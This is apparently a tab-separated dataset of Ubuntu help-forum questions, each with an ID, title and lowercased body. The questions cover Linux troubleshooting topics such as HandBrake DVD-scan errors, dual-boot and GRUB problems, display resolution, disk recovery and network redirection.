338996	ripping dvd with handbrake , no file found during scan	i 'm trying to rip a dvd with handbrake ( i own the original ) . no single file is found during the scan despite having installed the libdvdcss4 package . there are several errors occurring in the activity report , including that no data could be read . i have no idea how to fix this or what packages could be missing . any help is very much appreciated . [ 19:18:28 ] gtkgui : handbrake rev0 ( 2013082899 ) - linux x86_64 - http : //handbrake.fr [ 19:18:28 ] hb_init : starting libhb thread [ 19:18:28 ] hb_init : starting libhb thread libdvdread : using libdvdcss version 1.2.12 for dvd access [ 19:18:35 ] hb_scan : cpu count : 4 [ 19:18:35 ] hb_scan : cpu name : intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz [ 19:18:35 ] hb_scan : cpu type : intel microarchitecture sandy bridge [ 19:18:35 ] hb_scan : path=/media/americanbeauty/video_ts , title_index=0 libbluray/bdnav/index_parse.c:162 : indx_parse ( ) : error opening /media/americanbeauty/video_ts/bdmv/index.bdmv libbluray/bdnav/index_parse.c:162 : indx_parse ( ) : error opening /media/americanbeauty/video_ts/bdmv/backup/index.bdmv libbluray/bluray.c:1725 : nav_get_title_list ( /media/americanbeauty/video_ts ) failed ( 0x7f6350003690 ) [ 19:18:35 ] bd : not a bd - trying as a stream/file instead libdvdnav : using dvdnav version 4.1.3 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdread : attempting to use device /dev/sr0 mounted on /media/americanbeauty for css authentication libdvdnav : ca n't read name block . probably not a dvd-rom device . libdvdnav : unable to find map file '/home/timbo/.dvdnav/.map' libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 libdvdread : attempting to retrieve all css keys libdvdread : this can take a _long_ time , please be patient libdvdread : get key for /video_ts/video_ts.vob at 0x00000138 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_0.vob at 0x000002f0 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_01_1.vob at 0x000003a4 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_0.vob at 0x00002191 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_02_1.vob at 0x00002245 libdvdread : error cracking css key for /video_ts/vts_02_1.vob ( 0x00002245 ) ! ! libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_0.vob at 0x000b4647 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_03_1.vob at 0x000b4df3 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_0.vob at 0x0032fadf libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_04_1.vob at 0x0032fb93 libdvdread : error cracking css key for /video_ts/vts_04_1.vob ( 0x0032fb93 ) ! ! libdvdread : elapsed time 1 libdvdread : get key for /video_ts/vts_05_0.vob at 0x00398f16 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_05_1.vob at 0x00398fca libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_0.vob at 0x00398fe2 libdvdread : elapsed time 0 libdvdread : get key for /video_ts/vts_06_1.vob at 0x00399096 libdvdread : elapsed time 0 libdvdread : found 6 vts's libdvdread : elapsed time 1 libdvdread : using libdvdcss version 1.2.12 for dvd access libdvdread : attempting to use device /dev/sr0 mounted on /media/americanbeauty for css authentication [ 19:18:36 ] scan : dvd has 7 title ( s ) [ 19:18:36 ] scan : scanning title 1 [ 19:18:36 ] scan : opening ifo for vts 3 [ 19:18:36 ] scan : duration is 01:56:38 ( 6998520 ms ) [ 19:18:36 ] pgc_id : 1 , pgn : 1 : pgc : 0x7f63500126f0 [ 19:18:36 ] scan : vts=3 , ttn=1 , cells=0- > 29 , blocks=0- > 2600112 , 2600113 blocks [ 19:18:36 ] scan : checking audio 1 [ 19:18:36 ] scan : id=0x80bd , lang=english ( ac3 ) , 3cc=eng ext=1 [ 19:18:36 ] scan : checking audio 2 [ 19:18:36 ] scan : id=0x81bd , lang=deutsch ( ac3 ) , 3cc=deu ext=1 [ 19:18:36 ] scan : checking audio 3 [ 19:18:36 ] scan : id=0x82bd , lang=english ( ac3 ) ( director 's commentary 1 ) , 3cc=eng ext=3 [ 19:18:36 ] scan : checking audio 4 [ 19:18:36 ] scan : id=0xa3bd , lang=english ( lpcm ) , 3cc=eng ext=1 [ 19:18:36 ] scan : checking subtitle 1 [ 19:18:36 ] scan : id=0x22bd , lang=english ( closed caption ) , 3cc=eng ext=5 [ 19:18:36 ] scan : checking subtitle 2 [ 19:18:36 ] scan : id=0x23bd , lang=deutsch , 3cc=deu ext=1 [ 19:18:36 ] scan : title 1 has 29 chapters [ 19:18:36 ] scan : chap 1 c=0- > 0 , b=0- > 103689 ( 103690 ) , 252680 ms [ 19:18:36 ] scan : chap 2 c=1- > 1 , b=103690- > 226193 ( 122504 ) , 339840 ms [ 19:18:36 ] scan : chap 3 c=2- > 2 , b=226194- > 311794 ( 85601 ) , 204000 ms [ 19:18:36 ] scan : chap 4 c=3- > 3 , b=311795- > 430718 ( 118924 ) , 300000 ms [ 19:18:36 ] scan : chap 5 c=4- > 4 , b=430719- > 521330 ( 90612 ) , 274760 ms [ 19:18:36 ] scan : chap 6 c=5- > 5 , b=521331- > 581953 ( 60623 ) , 150200 ms [ 19:18:36 ] scan : chap 7 c=6- > 6 , b=581954- > 658201 ( 76248 ) , 203960 ms [ 19:18:36 ] scan : chap 8 c=7- > 7 , b=658202- > 780663 ( 122462 ) , 335680 ms [ 19:18:36 ] scan : chap 9 c=8- > 8 , b=780664- > 864913 ( 84250 ) , 232280 ms [ 19:18:36 ] scan : chap 10 c=9- > 9 , b=864914- > 921665 ( 56752 ) , 151400 ms [ 19:18:36 ] scan : chap 11 c=10- > 10 , b=921666- > 989555 ( 67890 ) , 211080 ms [ 19:18:36 ] scan : chap 12 c=11- > 11 , b=989556- > 1079573 ( 90018 ) , 224400 ms [ 19:18:36 ] scan : chap 13 c=12- > 12 , b=1079574- > 1110982 ( 31409 ) , 76520 ms [ 19:18:36 ] scan : chap 14 c=13- > 13 , b=1110983- > 1193851 ( 82869 ) , 235600 ms [ 19:18:36 ] scan : chap 15 c=14- > 15 , b=1193852- > 1303504 ( 109653 ) , 248240 ms [ 19:18:36 ] scan : chap 16 c=16- > 16 , b=1303505- > 1412041 ( 108537 ) , 300560 ms [ 19:18:36 ] scan : chap 17 c=17- > 17 , b=1412042- > 1499454 ( 87413 ) , 243720 ms [ 19:18:36 ] scan : chap 18 c=18- > 18 , b=1499455- > 1581097 ( 81643 ) , 241560 ms [ 19:18:36 ] scan : chap 19 c=19- > 19 , b=1581098- > 1675922 ( 94825 ) , 249480 ms [ 19:18:36 ] scan : chap 20 c=20- > 20 , b=1675923- > 1790579 ( 114657 ) , 320640 ms [ 19:18:36 ] scan : chap 21 c=21- > 21 , b=1790580- > 1872953 ( 82374 ) , 201960 ms [ 19:18:36 ] scan : chap 22 c=22- > 22 , b=1872954- > 2008297 ( 135344 ) , 332640 ms [ 19:18:36 ] scan : chap 23 c=23- > 23 , b=2008298- > 2129096 ( 120799 ) , 347840 ms [ 19:18:36 ] scan : chap 24 c=24- > 24 , b=2129097- > 2205915 ( 76819 ) , 215640 ms [ 19:18:36 ] scan : chap 25 c=25- > 25 , b=2205916- > 2344107 ( 138192 ) , 362840 ms [ 19:18:36 ] scan : chap 26 c=26- > 26 , b=2344108- > 2402113 ( 58006 ) , 177160 ms [ 19:18:36 ] scan : chap 27 c=27- > 27 , b=2402114- > 2498637 ( 96524 ) , 238320 ms [ 19:18:36 ] scan : chap 28 c=28- > 28 , b=2498638- > 2600106 ( 101469 ) , 325000 ms [ 19:18:36 ] scan : chap 29 c=29- > 29 , b=2600107- > 2600112 ( 6 ) , 520 ms [ 19:18:36 ] scan : aspect = 1.77778 [ 19:18:36 ] scan : scanning title 2 [ 19:18:36 ] scan : opening ifo for vts 1 [ 19:18:36 ] scan : duration is 00:00:24 ( 24600 ms ) [ 19:18:36 ] pgc_id : 1 , pgn : 1 : pgc : 0x7f63500131b0 [ 19:18:36 ] scan : vts=1 , ttn=1 , cells=0- > 1 , blocks=0- > 7625 , 7626 blocks [ 19:18:36 ] scan : checking audio 1 [ 19:18:36 ] scan : id=0x80bd , lang=english ( ac3 ) , 3cc=eng ext=1 [ 19:18:36 ] scan : checking audio 2 [ 19:18:36 ] scan : id=0xa1bd , lang=english ( lpcm ) , 3cc=eng ext=1 [ 19:18:36 ] scan : title 2 has 2 chapters [ 19:18:36 ] scan : chap 1 c=0- > 0 , b=0- > 7619 ( 7620 ) , 24000 ms [ 19:18:36 ] scan : chap 2 c=1- > 1 , b=7620- > 7625 ( 6 ) , 600 ms [ 19:18:36 ] scan : aspect = 1.77778 [ 19:18:36 ] scan : scanning title 3 [ 19:18:36 ] scan : opening ifo for vts 4 [ 19:18:36 ] scan : duration is 00:22:01 ( 1321600 ms ) [ 19:18:36 ] pgc_id : 1 , pgn : 1 : pgc : 0x7f6350020910 [ 19:18:36 ] scan : vts=4 , ttn=1 , cells=0- > 1 , blocks=0- > 430953 , 430954 blocks [ 19:18:36 ] scan : checking audio 1 [ 19:18:36 ] scan : id=0x80bd , lang=english ( ac3 ) , 3cc=eng ext=1 [ 19:18:36 ] scan : checking audio 2 [ 19:18:36 ] scan : id=0xa1bd , lang=english ( lpcm ) , 3cc=eng ext=1 [ 19:18:36 ] scan : checking subtitle 1 [ 19:18:36 ] scan : id=0x20bd , lang=english , 3cc=eng ext=1 [ 19:18:36 ] scan : title 3 has 2 chapters [ 19:18:36 ] scan : chap 1 c=0- > 0 , b=0- > 430947 ( 430948 ) , 1321000 ms [ 19:18:36 ] scan : chap 2 c=1- > 1 , b=430948- > 430953 ( 6 ) , 600 ms [ 19:18:36 ] scan : aspect = 1.33333 [ 19:18:36 ] scan : scanning title 4 [ 19:18:36 ] scan : opening ifo for vts 5 [ 19:18:36 ] scan : duration is 00:00:00 ( 600 ms ) [ 19:18:36 ] scan : ignoring title ( too short ) [ 19:18:36 ] scan : scanning title 5 [ 19:18:36 ] scan : opening ifo for vts 6 [ 19:18:37 ] scan : duration is 00:01:07 ( 67600 ms ) [ 19:18:37 ] pgc_id : 1 , pgn : 1 : pgc : 0x7f6350021340 [ 19:18:37 ] scan : vts=6 , ttn=1 , cells=0- > 1 , blocks=0- > 20992 , 20993 blocks [ 19:18:37 ] scan : checking audio 1 [ 19:18:37 ] scan : id=0x80bd , lang=english ( ac3 ) , 3cc=eng ext=1 [ 19:18:37 ] scan : checking audio 2 [ 19:18:37 ] scan : id=0xa1bd , lang=english ( lpcm ) , 3cc=eng ext=1 [ 19:18:37 ] scan : title 5 has 2 chapters [ 19:18:37 ] scan : chap 1 c=0- > 0 , b=0- > 20986 ( 20987 ) , 67000 ms [ 19:18:37 ] scan : chap 2 c=1- > 1 , b=20987- > 20992 ( 6 ) , 600 ms [ 19:18:37 ] scan : aspect = 1.77778 [ 19:18:37 ] scan : scanning title 6 [ 19:18:37 ] scan : opening ifo for vts 6 [ 19:18:37 ] scan : duration is 00:02:53 ( 173600 ms ) [ 19:18:37 ] pgc_id : 2 , pgn : 1 : pgc : 0x7f63500221d0 [ 19:18:37 ] scan : vts=6 , ttn=2 , cells=0- > 1 , blocks=20993- > 77013 , 56021 blocks [ 19:18:37 ] scan : checking audio 1 [ 19:18:37 ] scan : id=0x80bd , lang=english ( ac3 ) , 3cc=eng ext=1 [ 19:18:37 ] scan : checking audio 2 [ 19:18:37 ] scan : id=0xa1bd , lang=english ( lpcm ) , 3cc=eng ext=1 [ 19:18:37 ] scan : title 6 has 2 chapters [ 19:18:37 ] scan : chap 1 c=0- > 0 , b=20993- > 77007 ( 56015 ) , 173000 ms [ 19:18:37 ] scan : chap 2 c=1- > 1 , b=77008- > 77013 ( 6 ) , 600 ms [ 19:18:37 ] scan : aspect = 1.77778 [ 19:18:37 ] scan : scanning title 7 [ 19:18:37 ] scan : opening ifo for vts 2 [ 19:18:37 ] scan : duration is 01:01:25 ( 3685600 ms ) [ 19:18:37 ] pgc_id : 1 , pgn : 1 : pgc : 0x7f6350021f90 [ 19:18:37 ] scan : vts=2 , ttn=1 , cells=0- > 2 , blocks=0- > 730044 , 730045 blocks [ 19:18:37 ] scan : checking audio 1 [ 19:18:37 ] scan : id=0x80bd , lang=english ( ac3 ) , 3cc=eng ext=1 [ 19:18:37 ] scan : checking audio 2 [ 19:18:37 ] scan : id=0xa1bd , lang=english ( lpcm ) , 3cc=eng ext=1 [ 19:18:37 ] scan : checking subtitle 1 [ 19:18:37 ] scan : id=0x20bd , lang=english , 3cc=eng ext=1 [ 19:18:37 ] scan : title 7 has 2 chapters [ 19:18:37 ] scan : chap 1 c=0- > 1 , b=0- > 730038 ( 730039 ) , 3685000 ms [ 19:18:37 ] scan : chap 2 c=2- > 2 , b=730039- > 730044 ( 6 ) , 600 ms [ 19:18:37 ] scan : aspect = 1.33333 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:37 ] dvdnav : read error , error reading from dvd . [ 19:18:38 ] scan : decoding previews for title 1 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:38 ] scan : title angle ( s ) 1 [ 19:18:38 ] dvdnav : read error , error reading from dvd . [ 19:18:38 ] last error repeated 4 times [ 19:18:38 ] dvdnav : read error , error reading from dvd . [ 19:18:38 ] warning : could not read data for preview 1 , skipped [ 19:18:38 ] warning : could not read data for preview 2 , skipped [ 19:18:38 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:38 ] warning : could not read data for preview 3 , skipped [ 19:18:39 ] warning : could not read data for preview 4 , skipped [ 19:18:39 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:39 ] warning : could not read data for preview 5 , skipped [ 19:18:39 ] warning : could not read data for preview 6 , skipped [ 19:18:39 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:39 ] dvdnav : read error , error reading from dvd . [ 19:18:39 ] last error repeated 5 times [ 19:18:39 ] dvdnav : read error , error reading from dvd . [ 19:18:39 ] warning : could not read data for preview 7 , skipped [ 19:18:39 ] warning : could not read data for preview 8 , skipped [ 19:18:39 ] warning : could not read data for preview 9 , skipped [ 19:18:40 ] warning : could not read data for preview 10 , skipped [ 19:18:40 ] scan : decoding previews for title 2 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:40 ] scan : title angle ( s ) 1 [ 19:18:40 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:40 ] warning : could not read data for preview 1 , skipped [ 19:18:40 ] warning : could not read data for preview 2 , skipped [ 19:18:40 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:40 ] dvdnav : read error , error reading from dvd . [ 19:18:40 ] last error repeated 5 times [ 19:18:40 ] dvdnav : read error , error reading from dvd . [ 19:18:40 ] warning : could not read data for preview 3 , skipped [ 19:18:40 ] warning : could not read data for preview 4 , skipped [ 19:18:40 ] warning : could not read data for preview 5 , skipped [ 19:18:40 ] dvdnav : read error , error reading from dvd . [ 19:18:40 ] last error repeated 1 times [ 19:18:40 ] dvdnav : read error , error reading nav packet . [ 19:18:40 ] warning : could not read data for preview 6 , skipped [ 19:18:41 ] dvdnav : read error , error reading from dvd . [ 19:18:41 ] warning : could not read data for preview 7 , skipped [ 19:18:41 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:41 ] warning : could not read data for preview 8 , skipped [ 19:18:41 ] warning : could not read data for preview 9 , skipped [ 19:18:41 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:41 ] warning : could not read data for preview 10 , skipped [ 19:18:41 ] scan : decoding previews for title 3 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:41 ] scan : title angle ( s ) 1 [ 19:18:41 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:41 ] warning : could not read data for preview 1 , skipped [ 19:18:42 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:42 ] warning : could not read data for preview 2 , skipped [ 19:18:42 ] dvdnav : read error , error reading from dvd . [ 19:18:42 ] last error repeated 4 times [ 19:18:42 ] dvdnav : read error , error reading nav packet . [ 19:18:42 ] scan : decoding previews for title 5 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:42 ] scan : title angle ( s ) 1 [ 19:18:42 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:42 ] dvdnav : read error , error reading nav packet . [ 19:18:42 ] last error repeated 6 times [ 19:18:42 ] dvdnav : read error , error reading from dvd . [ 19:18:42 ] warning : could not read data for preview 1 , skipped [ 19:18:42 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:42 ] warning : could not read data for preview 2 , skipped [ 19:18:42 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:42 ] warning : could not read data for preview 3 , skipped [ 19:18:42 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:42 ] warning : could not read data for preview 4 , skipped [ 19:18:42 ] warning : could not read data for preview 5 , skipped [ 19:18:43 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:43 ] warning : could not read data for preview 6 , skipped [ 19:18:43 ] dvdnav : read error , error reading from dvd . [ 19:18:43 ] last error repeated 4 times [ 19:18:43 ] dvdnav : read error , error reading nav packet . [ 19:18:43 ] warning : could not read data for preview 7 , skipped [ 19:18:43 ] dvdnav : read error , error reading from dvd . [ 19:18:43 ] warning : could not read data for preview 8 , skipped [ 19:18:43 ] warning : could not read data for preview 9 , skipped [ 19:18:43 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:43 ] warning : could not read data for preview 10 , skipped [ 19:18:43 ] scan : decoding previews for title 6 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:43 ] scan : title angle ( s ) 1 [ 19:18:43 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:43 ] warning : could not read data for preview 1 , skipped [ 19:18:43 ] dvdnav : read error , error reading from dvd . [ 19:18:43 ] last error repeated 2 times [ 19:18:43 ] dvdnav : read error , error reading nav packet . [ 19:18:43 ] warning : could not read data for preview 2 , skipped [ 19:18:44 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:44 ] dvdnav : read error , error reading from dvd . [ 19:18:44 ] warning : could not read data for preview 3 , skipped [ 19:18:44 ] warning : could not read data for preview 4 , skipped [ 19:18:44 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:44 ] warning : could not read data for preview 5 , skipped [ 19:18:44 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:44 ] warning : could not read data for preview 6 , skipped [ 19:18:44 ] dvdnav : read error , error reading from dvd . [ 19:18:44 ] last error repeated 2 times [ 19:18:44 ] dvdnav : read error , error reading nav packet . [ 19:18:44 ] scan : decoding previews for title 7 libdvdnav : dvd disk reports itself with region mask 0x00fd0000 . regions : 2 [ 19:18:44 ] scan : title angle ( s ) 1 [ 19:18:44 ] warning : could not read data for preview 1 , skipped [ 19:18:45 ] hb_demux_ps : not a ps packet ( 00000000 ) [ 19:18:45 ] dvdnav : read error , error reading nav packet . [ 19:18:45 ] last error repeated 3 times [ 19:18:45 ] dvdnav : read error , error reading from dvd . [ 19:18:45 ] warning : could not read data for preview 2 , skipped [ 19:18:45 ] dvdnav : read error , error reading nav packet . [ 19:18:45 ] libhb : scan thread found 0 valid title ( s )
338999	lubuntu theme not applied to all programs	i am using lubuntu 13.04 , and i have installed gnome-terminal . but its menu buttons are not stylized according to the theme i have chosen ( clearlooks ) . this issue also appears on some other programs , what can i do to prevent this ? addition : it looks like it is the default theme
339002	no access to ubuntu after restarting	i have windows 8 pre-installed on my laptop . i downloaded ubuntu 12.04ls and installed it with wubi installer.but on restarting windows 8 is loaded directly and i cant get access to ubuntu ... will anyone please help me ? ?
339003	installing ubuntu 12.04.3 - error `` no root file system defined ''	hi i am trying to install ubuntu 12.04.03 on my desktop using a usb - with iso amd64 . windows crashed . however i get the error no root file system defined how do i solve the issue and install only ubuntu and delete windows . new to ubuntu so need spoonfeeding : )
339005	cant boot from usb	i tried to install ubuntu alongside with windows 8 , but for some reason , it just deleted the w8 installation . but now , i want windows back , because wine cant emulate all programs , which is , of course , to be expected . but : even though i created the usb key with winusb ( http : //www.addictivetips.com/ubuntu-linux-tips/winusb-create-bootable-windows-installer-usb-in-ubuntu-linux/ ) my computer wo n't boot from it ! i have changed the boot order , tried to use boot menu , but i am all out of ideas : ( the usb key is a kingston datatraveller 32gb usb3 , formatted as ntfs and all the windows files on it ( note , i am trying to install windows 7 ) , so i do n't understand where it went wrong . i hope you guys/girls have some ideas : ) jonas strand
339013	how to redirect traffic from wlan-bound ip to localhost	i am using a machine ( ubuntu 12.04.3 lts x64 ) with only wlan network access running a mythtv server . the machine is used as a video recorder . the mythtv backend is accessed by the ip address 192.168.2.124 bound to wlan interface . in case of wlan disconnection , recording television would not be possible . therefore i want to redirect connections from my machine to 192.168.2.124 directly to localhost . i already tried adding a line to the file /etc/hosts ( 127.0.0.1 192.168.2.124 ) $ iptables -t nat -a output -d 192.168.2.124 -j dnat -- to-destination 127.0.0.1 everything i get after disconnecting the wireless network is : $ ping 192.168.2.124 network is unreachable am i missing something ? thank you
339015	what does `` { } \ ; '' mean in linux command	sometimes i see command find . -name * -exec ls -a { } \ ; i was asked this to execute . what does { } \ ; means here ?
339021	kubuntu 13.04 second monitor resolution broken after crash	i 'm using kubuntu 13.04 with 2 monitors , primary at dvi-0 and the second one at displayport-0 . video card is a radeon hd 8490 . since it is n't supported by the proprietary drivers , the radeon kernel module is used . after installing the system both monitors worked fine with a maximum resolution of 1920x1200 @ 60 hz . however , after a system crash the second monitor is stuck to a resolution of 1024x768 @ 60 hz . i tried to reinstall xserver-xorg-video-ati and xserver-org manually set the resolution using xrandr which did not help . when i install the proprietary graphics driver , it tells my my video card is not supported on the lower right edge of the screen , but both monitors work with 1920x1200 again . switching back to the other driver leaves me with the same problem again . can anyone give me a hint ?
339024	meida , deletion , new user	hello i have a 2007 acer laptop my mom wants all her old media to not be deleted upon me using it . windows 7 is now expired and i need to put an os on the laptop asap . will my media be deleted if i use ubuntu as my new os ? i have been considering switching to ubuntu it looks nice .
339025	how to set an include system directory in the eclipse platform	from the 'ubuntu software center ' , i have installed eclipse platform version : 3.7.2. and 'eclipse-cdt c/c++ development tools ' . in the eclipse samples at eclipse.org , i see only these for java , not for c/c++ as i need . therefore i have downloaded hello-2.7.tar.xz from http : //ftp.gnu.org/gnu/hello/ , unpacked it into my eclipse directory and made a new c linux project for it . its 'project ... build all ' does not find the file from the line # include < config.h > of the hello.c file as you can see from the listing **** build of configuration debug for project hello-2.7 **** make all building file : ../src/hello.c invoking : gcc c compiler gcc -o0 -g3 -wall -c -fmessage-length=0 -mmd -mp -mf '' src/hello.d '' -mt '' src/hello.d '' -o `` src/hello.o '' `` ../src/hello.c '' ../src/hello.c:19:20 : fatal error : config.h : no such file or directory compilation terminated . make : *** [ src/hello.o ] error 1 **** build finished **** . please advise me how to set an include system directory in the eclipse platform . ( in its help , i have tried searching for it ; but it only started an indexing that shows '0 % complete ' even after several hours . the cpu is ubuntu release 12.04 ( precise ) 32âbit kernel linux 3.5.0-39-generic gnome 3.4.2 hardware memory : 994.9 mib processor : intel pentium ( r ) 4 cpu 3.00ghz x 2 system status available disk space 39.4 gib . ) at all , does the line # include < config.h > mean the same in linux as i am used to from windows and not a further file from the gnu pages ? thanks .
339028	caps lock indicator not synced	i have a laptop which i hook up to an external display when i 'm at home . i also connected an external keyboard and mouse which makes it more comfortable for me . i have noticed that pressing caps lock on the external keyboard does not light up the capslock indicator of the laptop keyboard ( and vice versa ) . when googling , i came across the setleds function , but when i type it into a console all i get is this : kdgkbled : inappropriate ioctl for device error reading current flags setting . maybe you are not on the console ? any idea if i can get this working ?
339029	data recovery on a samsung sv1203n hdd	let me start by saying that i am a beginner in ubuntu , but pretty knowledgeable with windows . i am having a strange problem trying to recover data from a samsung sv1203n hdd ( 120 gib ) . i have tried numerous things in both windows 7 and ubuntu 12.04 lts ( on a flash drive , an external hdd and a live cd ) . this drive has some very important data on it and i am praying some of you ubuntu geeks can help me get it back . here 's my problem . the hdd is clicking while i am booting , but it stops when i get into ubuntu or windows . it refuses to be detected in the bios , so i cant perform any tests on it . i have tried numerous things in both windows ( repair cd , jumpers , etc . ) and ubuntu ( boot-fix , gparted , testdisk , photorec , forcing a mount , etc. ) . but it all seems to lead me back to the fact that the drive is not being recognized in the bios . i 've even tried chilling the drive in the fridge , which worked well for another drive i work on , and i recovered all of the data in ubuntu flawlessly . i am assuming that since the drive stops clicking when i get into the os ' that there is hope for recovery . i am going to try an ide/sata to usb cable , and replacing the logic board , but i want to exhaust all other possibilities before i do that . any help would be greatly appreciated bye
339032	how can i remove my hard drive icons from my desktop ?	i 'd like to remove some of the icons on my desktop but i cant seem to find out how . specifically i 'm talking about my hard drive , its partitions , and the file system . any help would be great ! i 'm using ubuntu 12.04 , by the way .
339037	kubuntu 12.4 ca n't find second hard drive after most recent update	says it at the top. , kubuntu 12.4 seems to update weekly or so but after last update the second hard drive is no longer avaliable . been using linux since redhat 2 i think but ca n't seem to find the second hard drive . after reboot it is n't even showing on the file list . thanks bob and signing in is getting harder and harder if one does n't use social networks.. ! ! !
339041	can not resize drive	here is my saved gparted log : http : //pastebin.com/ddd0qh4n . this seems to be the important part of the log : partition length of 5860530176 sectors exceeds the msdos-partition-table-imposed maximum of 4294967295 here is a screenshot of the unmounted drive :
339049	ubuntu 13.04 dual boot windows 8- problem	i 've installed ubuntu 13.04 in efi mode on my dell inspiron 15z successfully . when i boot my laptop in uefi mode with secure boot off , i get blank ubuntu screen- i got no activity on hard disk led indicator . the ubuntu is not booted . but if i change boot mode from uefi to legacy , ubuntu works fine . infact , right now i am writing this post from ubuntu . also windows 8 is not in grub menu . can somebody tell me how can i add windows 8 on grub menu and how can i boot installed ubuntu in efi mode ? i 've tried to use boot-repair before , but it did n't go well . here 's the boot info file . thanks http : //paste.ubuntu.com/6041499/
339050	error message when using polipo on xubuntu 12.04 64-bit	i setup polipo today and made sure everything was configured to the best of my ability . i set it up where apt-get could access the internet through the proxy as well . when i fired up synaptic to to update my repositories , i noticed a series of error messages in the terminal window similar to the following : could n't create disk file /var/cache/polipo/extras.ubuntu.com/i3ovcimhgoskrhdwtjbwug== : permission denied it has denied a lot of requests this way and in synaptic they are showing as 'failed ' under the 'status ' tab . what do i need to do to correct this ? thank you .
339058	script to clear folder/drive on boot	i want to make my own /tmp folder on one of my drives /media/torrents how would i go about create a script to run on startup applications ? i already have this script where it mounts the drive on boot : udisks -- mount /dev/sdb2 the folder i want to get wiped every boot will be called .tmp thanks !
339061	poor wifi-connectivity in ubuntu	i have an intel wireless card . this is the lspci entry : 03:00.0 network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 34 ) i have a lot of trouble connecting to certain access points ( ie , the connection dies often/wo n't successfully reconnect ) in linux , whereas i am able to connect in windows on the same laptop . what should i do to fix the connectivity issues ? try different/proprietary drivers ? something else ? if it helps , this is my lsmod : http : //paste.ubuntu.com/6041598/
339063	do i have to create a dvd for install or can i use a cd-r ?	i want to download and install 12.04.3 but the laptop i have to use does not have a dvd-r drive but has a cd-r/cd-rw drive . can i use a standard cd to create a bootable livecd ?
339067	grub not showing	i have hp g6-2312ax laptop with windows 8 pre-installed , i installed ubuntu 12.04 lts successfully but after completing the setup i was asked to restart the system . after restarting it is loading windows directly . how should i install grub ? or is there any other way through which i can choose which os is to be load ?
339068	ca n't install on windows 8	i have downloaded several versions of ubuntu and none are installing on my windows 8 pc . i have tried with flash drives , cds and several applications . can anyone please help ? i need these installed asap for school purposes .
339070	can you get ubuntu server on a mac ?	i looked around for a bit and i have n't found the correct thread that fits my needs , i have an old mac powerbook g4 , i want to run ubuntu server on it , can i wipe out the entire harddrive and just run ubuntu ? ( i do n't need the mac os ) , or would i need to use a vm or dual boot . i tried a few things and it did n't work , i tried partitioning the hard drive and burning the image , i tried using bootcamp but that did not work and tried both usb and disk . i want to use the ubuntu server just so i can get familiar with linux servers and do my programming whenever i am on the road or not at my desktop . i do n't know if i am doing something wrong , i maybe any help would be much appreciated . specs : mac os x version 10.5.8 processor : 1.33 ghz powerpc g4 memory 2 gb ddr sdram processor : powerbook g4 1.1 l2 cache : 512kb
339071	how to transfer files one-way every x minutes from remote machine ?	here 's my setup : dell dimension w/ ubuntu server 12.10 running 24/7 at a remote location outside my internal network 1tb ext hd attached to server , actively downloading movies/tv raspberry pi w/ openelec & xbmc running locally 4tb hd attached to pi , hopefully receiving content from server i 'd like to transfer video files from the server over to my pi 's external hd every x mins/hours , once they 've finished downloading . i do not need to delete them from the remote location automatically , but in the event i clean them up , i do not want a two-way sync . does anyone have any suggestions for a script , scripting language , or transfer protocol i could use from the pi 's side ?
339072	firefox dropdown bookmarks menu disappears when quitting `` customize ''	i 'm using firefox 23.0 on ubuntu 12.04 lts 64-bit . i 'm having this annoying problem that when i select view -- > customize and drag the dropdown bookmarks menu to the bookmarks toolbar , it disappears the moment i quit customize . i 've started firefox in safemode to make sure it 's not an add-on problem , purged and reinstalled it , created new user profile ( moved .mozilla directory ) and purged ubufox ; none of these things helped . the bookmarks toolbar is enabled . i want to put the drop-down bookmark menu ( it 's a button ) on that toolbar . i go to customize and drag it onto the toolbar , but the moment i click `` done '' it disappears . if i go to customize again i still see it on the toolbar , but the moment i quite customize it disappears again .
339078	how to define where banshee stores the music in android devices ?	i recently bought a samsung s4 mini instead of a new iphone , hoping that i 'd be able to sync my music to the external sd card using ubuntu 13.04 . i 've managed to get banshee to copy a single track at a time , but it copies it to the music folder in the internal storage . could anyone please help me change the target folder , so that it saves onto the sd card instead ? when i right click the device in banshee , and click properties , the capacity shown includes that of the external card .
